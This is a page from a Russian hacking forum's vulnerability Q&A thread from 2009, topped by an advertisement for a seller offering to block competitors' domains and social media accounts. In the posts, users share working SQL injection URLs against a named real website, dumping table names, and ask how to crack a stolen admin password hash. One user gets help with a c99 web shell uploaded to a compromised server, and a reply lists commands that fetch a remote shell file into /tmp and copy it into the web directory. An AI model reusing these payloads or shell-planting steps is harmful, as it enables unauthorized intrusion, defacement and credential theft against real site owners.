УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 738 из 1393

738

Опции темы

Поиск в этой теме

Опции просмотра

#7371

27.05.2009, 21:25

udman

Постоянный

Регистрация: 21.04.2009

Сообщений: 321

Провел на форуме:
785842

Репутация: 239

Цитата:

http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+UNION+SELECT+0,1,2,column_na me,4,5,6,TABLE_NAME,8+FRO M+INFORMATION_SCHEMA.COLUMNS+LIMIT+145,3500+--+

рубает column_name а также schema_name что можно придумать?

#7372

27.05.2009, 21:47

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

Все выводится

http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,c olumn_name,9+from+information_schema.columns--+

http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,t able_schema,9+from+information_schema.columns--+

password -> 0x70617373776F7264

http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,t able_name,9+from+information_schema.columns+where+ column_name=0x70617373776F7264--+

phpads_users
site
Users

#7373

27.05.2009, 21:55

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Пиплы,вопрос! Залил c99 на удалённый сервак.Захожу в Sec - показывается только функция /etc/passwd.Пытаюсь аплоаднуть другой шелл в другую директорию,доступную на запись - фигли.Меня кидает обратно на диру,куда я залил шелл(/download).Чем вызвана эта болезнь ? Также интересует причина возникновения *чёрных пятен*,а точнее,огромного тёмного экрана вместо исходного кода рнр скрипта.Проблема возникает при попытке просмотреть исходный код.Права для гостей(в том числе,и для меня,хоть я и отношусь к группе www на сервере),есть ТОЛЬКО права на чтение,но я ведь и не собираюсь запускать скрипт,а лишь только глянуть его исходник.У кого какие мысли ?

#7374

27.05.2009, 21:59

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Во избежание лишних вопросов:

Apache: 1.3.27
PHP: 4.2.3
SAFE-MODE: OFF
Open-basedir: no value

#7375

27.05.2009, 22:39

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

))) а uname -a и id??

#7376

27.05.2009, 23:00

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Работают )

#7377

27.05.2009, 23:02

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Что самое интересное,так это то,что права,выставленные на фаил,не влияют))).Фаил тупо не грузится и всё тут - чёрный экран.(проверял на фаилах с правами 777)

#7378

27.05.2009, 23:28

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

ну дык как загрузил шелл - так и грузани его с тем именем и в ту папку, в которую ты хотел бы. Или не шелл, а что ты там хотел. Чо тут думать.

Плюс попробуй загрузить что угодно (не обязательно шелл) в папку /tmp ,как через choose, так и так вот:

1. lynx -source "http://site/shell.txt" > /tmp/shell.php
2. links -source "http://site/shell.txt" > /tmp/shell.php
3. wget -o /tmp/shell.php http://site/shell.txt
4. GET http://site/shell.txt > /tmp/shell.php
5. fetch -o shell.php http://site/shell.txt
6. curl --output shell.php http://site/shell.txt

а потом:

cp /tmp/shell.php /абсолютный_путь/папка/новое_название_шелла

ЗЫЖ Или сразу "cp"

Последний раз редактировалось Pashkela; 27.05.2009 в 23:39..

#7379

29.05.2009, 11:16

farpost

Познающий

Регистрация: 16.05.2009

Сообщений: 42

Провел на форуме:
190310

Репутация: 7

Есть 2 вопроса:

1) Про внедрение в иньекцию UPDATE.

Пробовал на различных серваках так:

Цитата:

news.php?id=3+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8 ,9;+UPDATE+имя_табл+SET+колонка1=0x. ..+WHERE+колонка2=0x.../*

Если вывод ошибок не отключен, то пишет что ошибка в синтаксесе.

Цитата:

news.php?id=3;+UPDATE+имя_табл+SET+коло нка1=0x...+WHERE+колонка2=0x.../*

Тоже не срабатывает

Цитата:

news.php?id=3;/*

И даже такие запросы почему то не проходят.

Поясните пожалуйста. Я понимаю если бы писало нет привелегий. У кго ибудь получалось значения в таблицах менять? Буду очень рад примеру

2) Вопрос. Получил пароль админа

В таблице с юзерами есть поле salt но оно у всех пустое. Походу подсаливание не задействовано.

Цитата:

admin:a1wGqpFwp6D8M

Как то зашифрован.

Зарегал своего юзера

Цитата:

b95tOay72AuUU - в таком он виде лежит в таблице
MdD2hK - сам пароль

Как расшифровать????